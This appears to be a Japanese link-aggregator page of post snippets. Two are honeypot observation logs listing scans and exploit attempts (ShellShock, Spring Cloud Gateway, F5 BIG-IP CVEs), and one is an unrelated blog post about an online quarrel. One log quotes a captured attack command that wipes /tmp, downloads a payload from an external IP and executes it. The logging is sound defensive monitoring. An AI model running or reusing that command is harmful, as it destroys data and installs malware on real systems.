                                                                              ハニーポット(仮) 観測記録 2024/02/10分です。 特徴 共通 D-link製品の脆弱性を狙うアクセス GPONルータの脆弱性を狙うアクセス zgrabによるスキャン行為 .jsへのスキャン行為 /.envへのスキャン行為 /.gitへのスキャン行為 Location:JP configファイルへのスキャン行為 phpMyAdminへのスキャン行為 を確認しました。 Location:US ShellShock脆弱性(CVE-2014-7169)を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 を確認しました。 Location:UK PHPの脆弱性(CVE-2012-1823)を狙うアクセス ShellShock脆弱性(CVE-2014-7169)を狙うアクセス Sprin

                                                                                2024/02/10 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
                                                                              • 白銀の杖と魔法の物語の問題 : 裏宇宙からの遺言 2ndブログ

                                                                                関係が決裂したので、私はSIN様のブログにずっと訪問しなかったのですが、SIN様はその後もエンライトや美雨に対して誹謗中傷を繰り返していたことが判明しました。 エンライトや美雨を批判した記事のタイトルを紹介します。 「エンライトさんまた間違っているよ…」 「三脈の法 死脈について ミスリードしている記事が拡散しています」 「三脈の法の欠陥 危険性について 拡散してください」 「脈診が占いに使われたわけ」 「陰性になるということを説明します 追記します①」 「猥褻なプロフィール画像は困ります」 記事だけじゃなく、コメント欄でもエンライト批判・美雨批判を続けてるのですが、その言葉遣いがあまりに苛烈だった。 「万死に値する」「悪党」「大罪」「悪魔的な行為」「破壊工作」 非難の的にされた記事「貴方の未来を予知する」のコメント欄にSIN様が登場しています。 私はこの頃、まだ勉強不足だったので、SIN

                                                                                  白銀の杖と魔法の物語の問題 : 裏宇宙からの遺言 2ndブログ
                                                                                • 2023/09/23 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

                                                                                  ハニーポット(仮) 観測記録 2023/09/23分です。 特徴 共通 zgrabによるスキャン行為 /.envへのスキャン行為 Apache Tomcatへのスキャン行為 phpMyAdminへのスキャン行為 Location:JP curlによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 5.188.210.227に関する不正通信 を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 193.47.61.47/jaws; sh /tmp/jaws Location:US F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 curlによるス

                                                                                    2023/09/23 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ